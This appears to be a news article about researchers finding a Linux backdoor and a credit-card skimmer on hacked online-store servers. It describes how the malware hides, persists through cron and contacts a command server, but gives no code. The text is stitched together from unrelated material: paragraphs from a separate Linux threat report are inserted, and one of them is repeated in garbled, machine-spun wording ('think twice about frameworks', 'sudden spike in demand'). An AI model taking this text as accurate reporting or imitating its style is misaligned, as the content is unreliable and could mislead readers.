Hackers deploy Linux malware, web skimmer on e-commerce servers

Security researchers have discovered that attackers are also deploying a Linux backdoor to compromised e-commerce servers after injecting a credit card skimmer into online store websites Attackers use this script to download and inject fake payment forms on the payment pages displayed to customers by the hacked online store. We found that the attacker started with automated e-commerce attack probes, testing dozens of weaknesses in common online store platforms, ”Sansec’s threat research team revealed.

Linux malware not detected by the security software

The Golang-based malware, spotted by Dutch cybersecurity company Sansec on the same server, was downloaded and executed on breached servers as the linux_avp executable. Once started, it immediately removes itself from the disk and camouflages itself as a “ps -ef” process which would be used to get a list of running processes. By analyzing the linux_avp backdoor, Sansec discovered that it was waiting for commands from a server in Beijing hosted on Alibaba’s network.

They also found that the malware would gain persistence by adding a new crontab entry that would re-download the malicious payload from its command and control server and reinstall the backdoor if it is detected and removed or the server reboots. So far, this backdoor has not been detected by anti-malware engines on VirusTotal even though a sample was first uploaded over a month ago on October 8.

The downloader could be the creator of linux_avp since it was submitted a day after researchers at Dutch cybersecurity company Sansec spotted it while investigating the e-commerce site breach.

Linux is powerful, universal, and reliable, but it is not without its flaws; like other operating systems, it is always susceptible to attack. This article discusses the state of Linux security in the first half of 2021 and provides an in-depth look at the Linux threat landscape. We discuss several pressing security issues that affect Linux, including the types of malware that exist in the Linux world, vulnerabilities that affect the Linux operating system, and the various software stacks that run on it. This article will also cover web application security risks and how attackers abuse them to compromise Linux systems running in the cloud.

The data presented in this article comes from Trend MicroTMSmart Protection Network ™ (SPN), or the data lake for all detections on all Trend Micro products. In addition, we also collected data from honeypots, sensors, anonymized telemetry, and other backend services. This data represents the true prevalence of malware exploitation and vulnerabilities in enterprises, from small organizations to large enterprises in various verticals.

Many consider Linux to be a unique operating system due to its stability, flexibility, and open-source nature. His stellar reputation is supported by his many notable accomplishments over the past few years. For example, 100% of the top 500 supercomputers in the world run Linux and 50.5% of the top 1000 websites in the world use it, according to a survey by W3Techs. Our previous article explained how Linux dominates the cloud, running on 90% of public cloud workloads in 2017. Linux is also uniquely supported for cloud workloads at the best value for money in the world. using Advanced RISC Machines (ARM) processors, such as AWS Graviton. And besides running on 96.3% of the world’s top 1 million web servers, Linux also powers smartwatches, bullet trains, and even the world’s major space programs.

Linux is amazing, all-inclusive, and dependable, however, it isn’t without its imperfections; like other working frameworks, it is consistently defenseless to assault. This article examines the province of Linux security in the primary portion of 2021 and gives a top to bottom glance at the Linux danger scene. We examine a few squeezing security gives that influence Linux, remembering the kinds of malware that exist for the Linux world, weaknesses that influence the Linux working framework, and the different programming stacks that sudden spike in demand for it. This article will likewise cover web application security dangers and how aggressors misuse them to think twice about frameworks running in the cloud.

Among Linux / Unix-based deployments, Red Hat employs a large portion of enterprise users, followed by AWS Linux and Ubuntu. Organizations rely on well-maintained sources of Linux deployments for their workloads, and this chart reflects the support provided by vendors. For example, Red Hat Enterprise Linux (RHEL) and Amazon Linux AMI are typically the first to offer fixes for their supported versions. While this data distribution should come as no surprise to most readers, it should be noted that about 2.6% of them are IBM AIX and Oracle Solaris. AIX and Oracle Solaris are known for their stability and robustness; businesses run critical workloads on these platforms.

At the time of writing, all command and control (C&C) servers were down, reminiscent of typical attacks targeting a small number of targets, with operators shutting down the infrastructure once their goals are met.